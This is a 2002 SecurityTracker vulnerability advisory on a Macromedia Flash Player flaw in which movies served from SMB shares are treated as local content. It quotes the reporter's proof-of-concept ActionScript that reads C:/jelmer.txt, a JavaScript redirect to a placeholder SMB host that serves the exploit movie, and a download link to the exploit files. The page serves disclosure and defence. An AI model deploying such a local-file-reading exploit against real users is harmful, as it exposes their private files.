SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Multimedia)  >   Adobe Flash Player Vendors:   Macromedia
Macromedia Flash Player Lets Remote Code from SMB Shares Access Local Files
SecurityTracker Alert ID:  1005366
SecurityTracker URL:  http://securitytracker.com/id/1005366
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Oct 7 2002
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  

Description:   A vulnerability was reported in Macromedia's Flash Player. A remote user can read files on the target user's computer.

It is reported that a remote user can supply a malicious Flash movie from an SMB server share that will be able to access local files on the target user's computer. Apparently, the Flash player processes content from SMB shares as local content.

A demonstration action script code is provided:

urlXML = new XML();
urlXML.onLoad = readXML;
myField = "Loading data...";
urlXML.load("file:///C:/jelmer.txt");

function readXML() {
myField = urlXML.toString();
}

This demonstration exploit reportedly invokes the Flash player's XML control to to read and display the contents of the file 'c:\jelmer.txt'. The following HTML can be used to trigger the script:

<script language="javascript">
document.location.href='\\\\HOST_IP\\exploit\\read.swf';
</script>

The vendor has reportedly been notified.

Impact:   A remote user can supply malicious code that can view files on the target user's computer.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.macromedia.com/software/flashplayer/ (Links to External Site)
Cause:   Access control error, State error
Underlying OS:  Linux (Any), Apple (Legacy "classic" Mac), UNIX (HP/UX), UNIX (macOS/OS X), UNIX (SGI/IRIX), UNIX (Solaris - SunOS), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Flash player can read local files



The following message apperently bounced the first time i send it :s

Flash player can read local files

Description

There is a flaw in the macromedia flash player wich allows reading and
sending of local files
The flaw lies in the fact that when a flash movie is loaded from a remote
smb share it is treated
as though it was loaded from the users harddisk.
Allowing the following action script code to work

urlXML = new XML();
urlXML.onLoad = readXML;
myField = "Loading data...";
urlXML.load("file:///C:/jelmer.txt");

function readXML() {
 myField = urlXML.toString();
}

It uses the flash's xml control to read and display the contents of
c:\jelmer.txt
In order for it to work one has to get a user to view a specially crafted
webpage wich could look like this

<script language="javascript">
 document.location.href='\\\\HOST_IP\\exploit\\read.swf';
</script>

It points the browser to the swf on the smb share so that it displays it

Demonstration

Download the following file and extract the contained swf to a remote
share,
start it from there (  for instance by dragging it from the share into
explorer or creating a html file as described above)

http://www.xs4all.nl/~jkuperus/exploit.zip

It will read and display the contents of c:\jelmer.txt

A live demonstration is not provided because it really isn't good practice
to open up smb shares to the
outside world and i am only able to host this sort of stuff at my home
server

vendor status

Macromedia was notified a long time ago  as far as I know they are still
looking in to it.


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC